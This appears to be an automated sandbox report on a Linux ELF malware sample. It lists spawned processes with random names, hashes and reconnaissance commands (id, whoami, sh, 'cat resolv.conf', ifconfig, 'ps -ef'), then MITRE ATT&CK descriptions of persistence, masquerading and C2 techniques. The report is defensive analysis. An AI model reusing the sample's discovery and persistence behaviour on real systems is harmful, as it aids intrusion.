Analysis Process: hvajrjqgqs PID: 5785, Parent PID: 2935

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	/usr/bin/hvajrjqgqs sh 5434
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5790, Parent PID: 5785

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	-
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5787, Parent PID: 5434

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5788, Parent PID: 5787

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5788, Parent PID: 2935

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	/usr/bin/hvajrjqgqs id 5434
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: hvajrjqgqs PID: 5791, Parent PID: 5788

General

Start time (UTC):	16:18:08
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvajrjqgqs
Arguments:	-
File size:	548638 bytes
MD5 hash:	19dfe465c483f7cbdba565017bfb9d71

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5794, Parent PID: 5434

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5795, Parent PID: 5794

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vopwilkkdb PID: 5795, Parent PID: 2935

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	/usr/bin/vopwilkkdb id 5434
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: vopwilkkdb PID: 5803, Parent PID: 5795

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	-
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5796, Parent PID: 5434

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5797, Parent PID: 5796

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vopwilkkdb PID: 5797, Parent PID: 2935

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	/usr/bin/vopwilkkdb "cat resolv.conf" 5434
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: vopwilkkdb PID: 5799, Parent PID: 5797

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	-
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5798, Parent PID: 5434

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5800, Parent PID: 5798

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vopwilkkdb PID: 5800, Parent PID: 2935

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	/usr/bin/vopwilkkdb whoami 5434
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: vopwilkkdb PID: 5806, Parent PID: 5800

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	-
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5801, Parent PID: 5434

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5802, Parent PID: 5801

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vopwilkkdb PID: 5802, Parent PID: 2935

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	/usr/bin/vopwilkkdb sh 5434
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: vopwilkkdb PID: 5807, Parent PID: 5802

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	-
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5804, Parent PID: 5434

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5805, Parent PID: 5804

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: vopwilkkdb PID: 5805, Parent PID: 2935

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	/usr/bin/vopwilkkdb sh 5434
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: vopwilkkdb PID: 5808, Parent PID: 5805

General

Start time (UTC):	16:18:13
Start date (UTC):	09/04/2024
Path:	/usr/bin/vopwilkkdb
Arguments:	-
File size:	548649 bytes
MD5 hash:	0f40531914c46b563c96af8d96886016

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5813, Parent PID: 5434

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5814, Parent PID: 5813

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: bqdemabuld PID: 5814, Parent PID: 2935

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	/usr/bin/bqdemabuld gnome-terminal 5434
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: bqdemabuld PID: 5819, Parent PID: 5814

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	-
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5815, Parent PID: 5434

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5816, Parent PID: 5815

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: bqdemabuld PID: 5816, Parent PID: 2935

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	/usr/bin/bqdemabuld "ifconfig eth0" 5434
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: bqdemabuld PID: 5822, Parent PID: 5816

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	-
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5817, Parent PID: 5434

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5818, Parent PID: 5817

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: bqdemabuld PID: 5818, Parent PID: 2935

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	/usr/bin/bqdemabuld id 5434
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: bqdemabuld PID: 5825, Parent PID: 5818

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	-
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5820, Parent PID: 5434

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5821, Parent PID: 5820

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: bqdemabuld PID: 5821, Parent PID: 5820

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	/usr/bin/bqdemabuld sh 5434
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: bqdemabuld PID: 5826, Parent PID: 5821

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	-
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5823, Parent PID: 5434

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5824, Parent PID: 5823

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: bqdemabuld PID: 5824, Parent PID: 2935

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	/usr/bin/bqdemabuld "cat resolv.conf" 5434
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: bqdemabuld PID: 5827, Parent PID: 5824

General

Start time (UTC):	16:18:18
Start date (UTC):	09/04/2024
Path:	/usr/bin/bqdemabuld
Arguments:	-
File size:	548638 bytes
MD5 hash:	f9709c862f5a03fa9407ecba4f48204d

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5831, Parent PID: 5434

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5832, Parent PID: 5831

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: btbrmdkijd PID: 5832, Parent PID: 2935

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	/usr/bin/btbrmdkijd "ifconfig eth0" 5434
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: btbrmdkijd PID: 5837, Parent PID: 5832

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	-
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5833, Parent PID: 5434

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5834, Parent PID: 5833

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: btbrmdkijd PID: 5834, Parent PID: 2935

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	/usr/bin/btbrmdkijd "cat resolv.conf" 5434
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: btbrmdkijd PID: 5841, Parent PID: 5834

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	-
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5835, Parent PID: 5434

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5836, Parent PID: 5835

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: btbrmdkijd PID: 5836, Parent PID: 2935

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	/usr/bin/btbrmdkijd gnome-terminal 5434
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: btbrmdkijd PID: 5843, Parent PID: 5836

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	-
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5838, Parent PID: 5434

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5839, Parent PID: 5838

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: btbrmdkijd PID: 5839, Parent PID: 2935

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	/usr/bin/btbrmdkijd "cat resolv.conf" 5434
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: btbrmdkijd PID: 5844, Parent PID: 5839

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	-
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5840, Parent PID: 5434

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5842, Parent PID: 5840

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: btbrmdkijd PID: 5842, Parent PID: 2935

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	/usr/bin/btbrmdkijd pwd 5434
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: btbrmdkijd PID: 5845, Parent PID: 5842

General

Start time (UTC):	16:18:23
Start date (UTC):	09/04/2024
Path:	/usr/bin/btbrmdkijd
Arguments:	-
File size:	548638 bytes
MD5 hash:	40acb49ea1ca4eb792b90a95622521f4

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5848, Parent PID: 5434

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5849, Parent PID: 5848

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5849, Parent PID: 5848

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	/usr/bin/hvcnxeaxdt "ps -ef" 5434
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5855, Parent PID: 5849

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	-
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5850, Parent PID: 5434

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5851, Parent PID: 5850

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5851, Parent PID: 2935

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	/usr/bin/hvcnxeaxdt ifconfig 5434
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5859, Parent PID: 5851

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	-
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5852, Parent PID: 5434

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5853, Parent PID: 5852

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5853, Parent PID: 2935

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	/usr/bin/hvcnxeaxdt id 5434
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5860, Parent PID: 5853

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	-
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5854, Parent PID: 5434

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5856, Parent PID: 5854

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5856, Parent PID: 2935

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	/usr/bin/hvcnxeaxdt whoami 5434
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5861, Parent PID: 5856

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	-
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5857, Parent PID: 5434

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: eTASxT3bjO.elf PID: 5858, Parent PID: 5857

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/tmp/eTASxT3bjO.elf
Arguments:	-
File size:	548616 bytes
MD5 hash:	694a672878a1f7945c020a0a3ca74367

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5858, Parent PID: 2935

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	/usr/bin/hvcnxeaxdt id 5434
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: hvcnxeaxdt PID: 5862, Parent PID: 5858

General

Start time (UTC):	16:18:28
Start date (UTC):	09/04/2024
Path:	/usr/bin/hvcnxeaxdt
Arguments:	-
File size:	548638 bytes
MD5 hash:	9b3751de544e55a80ad32cf965ebd9b5

Chronological Activities

Analysis Process: systemd PID: 5446, Parent PID: 5445

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 5446, Parent PID: 5445

General

Start time (UTC):	16:16:25
Start date (UTC):	09/04/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

